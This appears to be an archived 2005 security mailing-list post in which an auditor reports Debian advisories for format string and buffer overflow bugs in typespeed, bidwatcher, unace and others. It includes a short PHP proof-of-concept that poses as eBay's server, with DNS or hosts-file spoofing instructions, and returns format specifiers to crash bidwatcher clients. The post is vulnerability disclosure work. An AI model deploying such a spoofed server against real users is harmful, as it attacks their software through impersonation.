( The Subject line is from an ad I saw in the Brussels
airport, going home from FOSDEM 2005. The Debian
QA talk at that conference mentioned us BTW:
http://people.debian.org/~jeroen/fosdem2005qa.html/img8.html )
Lately I've finished auditing some stuff I had lying around
half-audited for a while. This resulted in the publication of
DSA-684-1 - a combined format string bug and buffer overflow of
the malloc()+sprintf() kind in typespeed - and DSA-687-1 - a format
string bug in bidwatcher that requires hacking someone's DNS server
or doing a man-in-the-middle attack.
Here is my crash exploit for bidwatcher, BTW (save it as
eBayISAPI.dll):
<?php
# fake-ebay - shows a format string bug in bidwatcher
# Ulf Harnhammar, February 2005
#
# Instructions:
# ------------
#
# You install this script in a directory called /aw-cgi from the web root.
# You also configure the web server so .dll runs PHP scripts. Then you
# fiddle with the DNS server or with /etc/hosts, so your server is
# cgi.ebay.com and cgi3.ebay.com. As soon as any user starts bidwatcher, they
# get hit by the format string bug.
$query = $_SERVER['QUERY_STRING'];
if ($query == 'TimeShow')
{
header('Location: http://cgi3.ebay.com/aw-cgi/eBayISAPI.dll?AdultLoginShow');
exit;
}
if (preg_match('/^MfcISAPICommand=AdultLogin&/', $query))
echo "%n%n%n%n\n";
?>
I also found a whole bunch of vulnerabilities in unace (bug
#296839). Additionally I ran my Perl script for finding format
string bugs over the source of all setuid/gid software in Debian
and found some not security related format string bugs in icebreaker
(#297644) and trackballs (#297646).
// Ulf Härnhammar
Received on Fri Mar 04 2005 - 16:35:31 GMT